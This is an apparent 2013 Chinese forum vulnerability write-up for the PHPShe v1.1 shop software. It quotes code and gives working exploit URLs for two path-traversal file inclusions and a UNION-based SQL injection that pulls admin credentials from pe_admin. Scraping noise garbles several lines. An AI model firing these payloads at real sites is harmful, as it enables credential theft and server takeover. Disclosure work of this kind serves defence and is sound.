
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-16 16:45:03
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0x00 整体大概参数传输
//common.php
// Request-to-variable import used by every entry point quoted on this page.
// Each key of $_GET / $_POST / $_SESSION / $_COOKIE becomes a global carrying a
// source prefix (extract(..., EXTR_PREFIX_ALL, '_g') => $_g_<key>, '_p' =>
// $_p_<key>, '_s' => $_s_<key>, '_c' => $_c_<key>).
// NOTE(review): pe_trim() / pe_stripslashes() are not on this page; by name they
// only trim and un-escape, so no SQL or path validation happens here and every
// consumer of a $_g_* / $_p_* / $_c_* variable must validate it itself.
if (get_magic_quotes_gpc()) {
    // magic_quotes already added backslashes; strip them before importing
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    !empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
    !empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
// Cookies are client-controlled, so $_c_* variables deserve the same distrust
// as $_g_* / $_p_* (the index.php listing below unserialize()s $_c_cart_list).
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
0x01 包含漏洞

//首页文件
<?php
// Front controller: load caches, compute header widgets, then dispatch to
// module/<module>/<mod>.php.
include('common.php');
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');
// $cache_setting is not assigned on this page; presumably set in common.php — confirm.
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();
// NOTE(review): $_c_cart_list comes from $_COOKIE (common.php extract() with
// prefix '_c'), so the guest branch unserialize()s client-controlled data; a
// JSON-encoded cart read with json_decode() would avoid that.
$cart_num = pe_login('user') ? $db->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
// Dispatch: $module and $mod come from the routing lines of common.php quoted
// below, where $mod is taken verbatim from $_POST / $_GET. Mitigation: accept
// only a known module list (or at least /^[a-z0-9_]+$/) and check
// file_exists() before include().
include("{$pe['path_root']}module/{$module}/{$mod}.php");  // $mod is user-controlled: limited ("鸡肋") local file inclusion
pe_result();
?>
//common 文件 第15行开始
//url路由配置
// url routing: defaults first, then request overrides (POST wins over GET).
// The truthiness test means a value of '0' or '' falls through to the default.
$module = $mod = $act = 'index';
// $mod is used unfiltered as a path segment by index.php's include();
// restrict it to a whitelist of module names before use.
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
// NOTE(review): no prior assignment of $id is visible, so the final fallback
// reads an undefined variable (null) — confirm against the full common.php.
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
& ~) S8 A9 e. W1 X' v//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
* l4 |& Y( |$ H& [2 x( Y# V

: Z1 p* J2 X  }2 z' u
5 a% [0 w! A+ ]; P# y" d8 m4 ?
0x02 搜索注入
<code id="code2">

//product.php文件
case 'list':
    // Product listing / search. $id comes from the routing lines of common.php.
    $category_id = intval($id);  // the int cast keeps this parameter safe for SQL
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // search: the WHERE clause is built as a raw string and handed to pe_selectall()
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        // NOTE(review): the "$sql" prefix of "$sqlwhere" looks lost in the forum
        // paste; presumably "$sqlwhere .=" as on the surrounding lines — confirm upstream.
        where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    // $_g_keyword is $_GET['keyword'] (common.php extract()) interpolated into
    // SQL with no escaping — the injection point of 0x02. Mitigation: a
    // parameterised query, or at minimum the driver's string-escape function
    // plus escaping of the LIKE wildcards % and _.
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; // keyword is not filtered for SQL
    if ($_g_orderby) {
        // NOTE(review): $_g_orderby is also interpolated unescaped (column name
        // and direction); not covered by the writeup, but the same mitigation
        // applies — map both parts against a fixed whitelist.
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // hot-sellers ranking
    $product_hotlist = product_hotlist();
    // current breadcrumb path
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));
//跟进selectall函数库
// Generic SELECT helper (quoted from the DB library to show where the raw
// string built in product.php ends up).
//
// $table      table name, interpolated after the `dbpre` prefix
// $where      array or raw string; passed through _dowhere() (not on this page)
// $field      column list, interpolated verbatim
// $limit_page array(per_page, page) forwarded to sql_selectall()
// Returns whatever sql_selectall() returns (row set; exact shape not visible here).
// NOTE(review): $table, $field and a string $where are concatenated straight
// into the statement, so every caller is responsible for escaping; a
// prepared-statement API would remove that burden from callers.
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // build the WHERE clause
    $sqlwhere = $this->_dowhere($where);
    return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
//exp
! {; h$ x9 Z1 h6 j, n5 B: n. n; dproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1! Q3 x4 p3 S/ z1 u& r% L

</code>
0x03 包含漏洞2

9 h# N) n+ T1 F# t" N<code id="code3">

//order.php

case 'pay':
    // Payment step for an unpaid order. $_g_id / $_p_* come from the
    // common.php extract() of $_GET / $_POST.
    $order_id = pe_dbhold($_g_id);  // pe_dbhold() is not on this page; by name a DB-escape helper — confirm
    $cache_payway = cache::get('payway');
    foreach($cache_payway as $k => $v) {
        // payway_config is stored serialised; this is cache/DB data, not request data
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            // flatten the bank text to a single line for display
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    !$order['order_id'] && pe_error('订单号错误...');
    if (isset($_p_pesubmit)) {
        // NOTE(review): $_p_info is the whole POST info[] array handed to
        // pe_update() unfiltered; presumably every key becomes a column
        // assignment — confirm against pe_update(), and restrict it to the
        // fields this form is meant to set (e.g. order_payway).
        if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo '正在为您连接支付网站,请稍后...';
            // $_p_info['order_payway'] selects the include path verbatim — the
            // inclusion of 0x03. $cache_payway, loaded above, already holds the
            // valid payway keys, so `isset($cache_payway[$_p_info['order_payway']])`
            // checked before this include() is a natural whitelist.
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        }// once everything is in place the ("鸡肋") inclusion can be performed
        else {
            pe_error('支付错误...');
        }
    }
    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));
    break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>8 ~- q, O2 O* R( X" h' ~
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg
